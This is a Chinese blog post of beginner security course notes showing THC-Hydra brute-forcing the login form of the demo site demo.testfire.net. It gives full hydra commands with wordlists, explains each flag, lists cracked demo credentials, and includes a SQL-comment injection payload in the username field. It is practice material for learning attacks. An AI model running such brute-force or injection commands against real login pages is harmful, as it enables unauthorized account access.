iT邦幫忙

第 12 屆 iThome 鐵人賽

DAY 29
0
自我挑戰組

初學資安,30篇課程筆記系列 第 29

Day29_滲透 thc-hydra

  • thc-hydra
    https://github.com/maaaaz/thc-hydra-windows/releases
    • 使用環境:VMware Windows 7
    • 命令列的帳號密碼破解工具
      • 猜帳號密碼
        • 使用瀏覽器查找該網頁原始碼
          https://ithelp.ithome.com.tw/upload/images/20201010/201302888fJWcQrkMJ.png

          先找form > 帳號欄位為uid > 密碼欄位為passw > 使用post傳給doLogin

        • 破解
          https://ithelp.ithome.com.tw/upload/images/20201010/20130288GbNZCZRsXG.png

          cd C:\Users\user\Downloads\thc-hydra-windows-v8.5

          移到hydra目錄下

          hydra -L user.lst -P password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

          -L > 指定帳號字典檔
          -l > 指定一個帳號
          -P > 指定密碼字典檔
          -p > 指定一個密碼
          http-post-form > 服務模組
          /doLogin > 驗證網址
          : > 分隔
          uid=^USER^&passw=^PASS^&btnSubmit=Login > 要傳送給驗證網址的資料
          Login Failed > 判斷準則
          C=/login.jsp > 指定在傳送資料前,先向網址取得Cookie資訊
          login:admin password:admin > 破解的第一組帳號密碼
          login:jsmith password:demo1234 > 破解的第二組帳號密碼

        • 密碼固定,破解帳號
          https://ithelp.ithome.com.tw/upload/images/20201010/20130288VoSzzwWuWC.png

          hydra -L user.lst -p 1234 demo.testfire.net http-post-form "/doLogin:uid=^USER^' --&passw=1234:Login Failed:C=/login.jsp"

          固定密碼為1234 > 破解帳號
          login:admin password:1234 > 破解的第一組帳號
          login:jsmith password:1234 > 破解的第二組帳號


上一篇
Day28_滲透 Burp suite-Intruder Payloads, Options
下一篇
Day30_滲透 patator
系列文
初學資安,30篇課程筆記31
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言